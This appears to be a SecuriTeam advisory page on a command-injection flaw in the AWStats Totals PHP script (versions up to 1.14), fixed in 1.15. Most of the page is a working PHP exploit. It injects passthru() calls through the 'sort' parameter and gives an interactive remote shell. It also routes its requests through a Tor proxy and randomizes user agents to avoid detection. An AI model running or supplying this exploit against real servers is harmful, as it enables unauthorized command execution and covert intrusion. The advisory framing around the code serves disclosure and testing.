SecuriTeam - AWStats Totals Multiple Vulnerabilities (Exploit)

Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus

SecuriTeam
Beyond Security

SecuriTeam Home
Ask the Team
Mailing Lists
Advertising Info
Blogs

Black Box Testing
Vulnerability Assessment
Vulnerability Scanner

	SecuriTeam in Your Inbox

	E-mail this article to a friend

New vulnerability?
New tool?
Tell us

AWStats Totals is "a simple php script to view the AWStats totals (Unique visitors, Number of visits, Pages, Hits and Bandwidth) of multiple sites. The page has a month selection input form and you can sort on each column. It also includes a php wrapper script". Multiple vulnerabilities in AWStats Totals allow remote attackers to cause the program to execute arbitrary commands, the following exploit code can be used to test your system for the mentioned vulnerability.

Credit:
The information has been provided by Ricardo Almeida.

Protect your website!
Use an External Vulnerability Scanner!
Nothing to install. First report in 1 hour!
www.beyondsecurity.com/vulnerability-scanner

Vulnerable Systems:
* AWStats Totals versions 1.0 up to 1.14

Immune Systems:
* AWStats Totals version 1.15

Exploit:
<?php
/*
* Remote Execution Exploit for AWStats Totals vulnerability (Interacitve Shell)
*
* Author: Ricardo Almeida
* email: ricardojba[at]aeiou[DoT]pt
*
* Greetz
* The hacker webzine authored by Ronald van den Heetkamp for his code
*
* Credits: Vulnerabilities reported by Emory University.
* http://userwww.service.emory.edu/~ekenda2/EMORY-2008-01.txt
*/

function wrap($url){
  $ua = array('Mozilla','Opera','Microsoft Internet Explorer','ia_archiver');
  $op = array('Windows','Windows XP','Linux','Windows NT','Windows 2000','OSX');
  $agent = $ua[rand(0,3)].'/'.rand(1,8).'.'.rand(0,9).' ('.$op[rand(0,5)].' '.rand(1,7).'.'.rand(0,9).'; en-US;)';
  # tor or other proxy
  $tor = '127.0.0.1:8118';
  $timeout = '300';
  $ack = curl_init();
  curl_setopt ($ack, CURLOPT_PROXY, $tor);
  curl_setopt ($ack, CURLOPT_URL, $url);
  curl_setopt ($ack, CURLOPT_HEADER, 1);
  curl_setopt ($ack, CURLOPT_USERAGENT, $agent);
  curl_setopt ($ack, CURLOPT_RETURNTRANSFER, 1);
  curl_setopt ($ack, CURLOPT_FOLLOWLOCATION, 1);
  curl_setopt ($ack, CURLOPT_TIMEOUT, $timeout);
  $syn = curl_exec($ack);
  $info = curl_getinfo($ack);
  curl_close($ack);

  if($info['http_code'] == '200') {
    return $syn;
    die();
  } else {
    return "Fail! :".$info['http_code']."\r\n";
  }
}

if ($argc != 2) {
  die("Usage: exploit.php <host>\n");
}
array_shift($argv);
$host = $argv[0];

# Start the interactive shell
while(1){
  fwrite(STDOUT, "[shell:~ # ");
  $cmd = preg_replace('/ /','%20',trim(fgets(STDIN)));
  if ($cmd == "exit") {die();};
  $attackurl = "http://".$host."/"."awstatstotals.php?sort=%22%5d%2epassthru%28%27".$cmd."%27%29%2eexit%28%29%2e%24a%5b%22";
  echo wrap($attackurl);
}
?>

	Sun Java System Identiy Manager Users Enumeration
	Microsoft Internet Explorer XML Buffer Overflow (Exploit)
	Opera file:// Overflow
	Stack-Based Buffer Overflow in the Network Manager of Castle Rock Computing (SNMPc)
	PacketTrap TFTPD DoS
	Vulnerability in Server Service Allows Code Execution (MS08-067, PoC)
	Microsoft Windows AFD.sys Privilege Escalation (Kartoffel Plugin, Exploit, MS08-066)
	Token Kidnapping Windows 2003 (Exploit)
	GuildFTPd CWD and LIST Heap Corruption PoC/DoS (Exploit)
	NoticeWare E-mail Sever (POP3) Pre-Auth DoS
	vxFtpSrv CWD Command Overflow
	DESlock+ Local Denial of Service (Exploit)
	Chilkat XML ActiveX Arbitrary File Creation/Execution
	Postfix Local Denial of Service (PIPE, Exploit)
	Debian Sarge Multiple IMAP Server DoS (debianimapers.c)